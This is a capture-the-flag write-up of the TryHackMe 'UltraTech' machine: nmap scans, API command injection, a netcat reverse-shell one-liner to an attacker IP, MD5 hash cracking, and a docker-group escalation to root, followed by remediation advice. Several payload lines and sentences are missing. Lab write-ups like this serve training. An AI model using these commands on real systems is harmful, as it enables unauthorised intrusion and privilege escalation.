“UltraTech” is a boot2root machine on TryHackMe. It has intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information you have is the company’s name and their server’s IP address.
Initial access to the machine could be obtained through a command injection vulnerability in the API. After that, credentials could be dumped from a SQLite database file. The hashed passwords could be cracked. The credentials were used to escalate privileges to another user on the box. That user was inside the docker group, which was used to escalate privileges further to root.
First, an Nmap scan was used to scan all ports on the target machine.
sudo nmap -p- -oN nmap/all -vv 10.10.29.189
In the next step, version enumeration, script scanning and OS enumeration were conducted on the previously discovered ports with Nmap.
sudo nmap -p21,22,8081,31331 -sC -sV -O 10.10.29.189 -oN nmap/scripts -vv
The landing page of the web service on port 8081 showed an API running.
On port 31331 the company web site was served.
A robots.txt file could be found on the web page. This file revealed that there is a file called “utech_sitemap.txt”.
The sitemap revealed further “hidden” pages.
The interesting page here is “partners.html”. This page contains a login form.
If a user tries to log in, the credentials are sent to “http://10.10.29.189:8081/auth”. Furthermore, the web app was calling the URL “http://10.10.29.189:8081/ping?ip=10.10.29.189” to check if the API is still running. It was possible to ping the attacker machine by changing the
The filter on the parameter ip could be evaded by the following payload:
The following bash script was created and served by the attacker via HTTP.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.73.174 443 >/tmp/f
The file was then uploaded to the victim by calling the following URL
After calling the following URL, the victim connected to a Netcat listener of the attacker.
After getting the shell, there was a SQLite database file inside the current working directory. This file was exfiltrated so it could be analyzed.
The SQLite database contained MD5 hashes of two users.
Both password hashes could be successfully cracked with Crackstation.
Privilege Escalation to r00t
“r00t” is also a user on the box. A privilege escalation to “r00t” was possible because of a password reuse.
At this point it was also possible to log in to the SSH service with r00t’s credentials. Furthermore, the r00t user is in the “docker” group, as you can see in the above picture.
The privilege escalation could be accomplished by abusing the
docker run -v /root:/mnt -it bash
The filter on the API should be hardened. Furthermore, functionality that is not ready for use should not be deployed on a live machine. Also, passwords should not be hashed with the MD5 hash function. An appropriate password hashing function should be used instead, e.g. PBKDF2. The password policy should prohibit the use of common passwords. Password reuse should also be prohibited. Users of the organization should be encouraged to follow the password policy. Also keep in mind that adding a user to the docker group will also give them root rights. The user r00t should not be in the docker group if not needed.